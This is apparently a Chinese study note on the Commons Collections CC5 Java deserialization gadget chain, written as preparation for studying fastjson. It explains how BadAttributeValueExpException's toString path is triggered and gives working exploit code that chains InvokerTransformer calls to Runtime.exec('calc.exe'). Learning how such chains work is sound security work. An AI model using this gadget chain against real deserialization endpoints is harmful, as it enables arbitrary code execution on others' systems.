java反序列化CC5链

Java反序列化
,

前言

为了后续学习fastjson稍微铺垫一下
CC5比起CC6的差异来讲
我们打CC6的时候,是从HashMap的readObject开始,搭了一条触发TiedMapEntry的hashcode->setValue->LazyMap#get方法的链子
而在CC5上,它的入口类替换了,变成一条去触发TiedMapEntry的toString方法的链子,后半段一模一样
即,在CC5上,我们将会学习,如何触发toString方法

CC5

比起CC6来说,就是把HashMap那一连串改成

1
2
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
setFieldValue(badAttributeValueExpException,"val",tme);

就实现了CC5
当然还得深入链子构造 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ObjectInputStream.GetField gf = ois.readFields();
    Object valObj = gf.get("val", null);

    if (valObj == null) {
        val = null;
    } else if (valObj instanceof String) {
        val= valObj;
    } else if (System.getSecurityManager() == null
            || valObj instanceof Long
            || valObj instanceof Integer
            || valObj instanceof Float
            || valObj instanceof Double
            || valObj instanceof Byte
            || valObj instanceof Short
            || valObj instanceof Boolean) {
        val = valObj.toString();
    } else { // the serialized object is from a version without JDK-8019292 fix
        val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
    }
}

通过反射将TiedMapEntry类赋给val值,触发toString方法

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
Transformer[] fakeTransformers = new Transformer[] {new
                ConstantTransformer(1)};
Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] {
                String.class,
                Class[].class }, new Object[] { "getRuntime",
                new Class[0] }),
        new InvokerTransformer("invoke", new Class[] {
                Object.class,
                Object[].class }, new Object[] { null, new
                Object[0] }),
        new InvokerTransformer("exec", new Class[] { String.class
        },
                new String[] { "calc.exe" }),
};
Transformer transformerChain = new
        ChainedTransformer(fakeTransformers);
Map innerMap = new HashMap();
Map outerMap = LazyMap.lazyMap(innerMap, transformerChain);
TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
setFieldValue(badAttributeValueExpException,"val",tme);
setFieldValue(transformerChain,"iTransformers",transformers);

由于TiedMapEntry类后续链子已说明,不赘述
关键学习如何触发到toString方法

结语

也是为了后续学习fastjson铺垫,到时候我们还可以学到其他触发toString方法的链子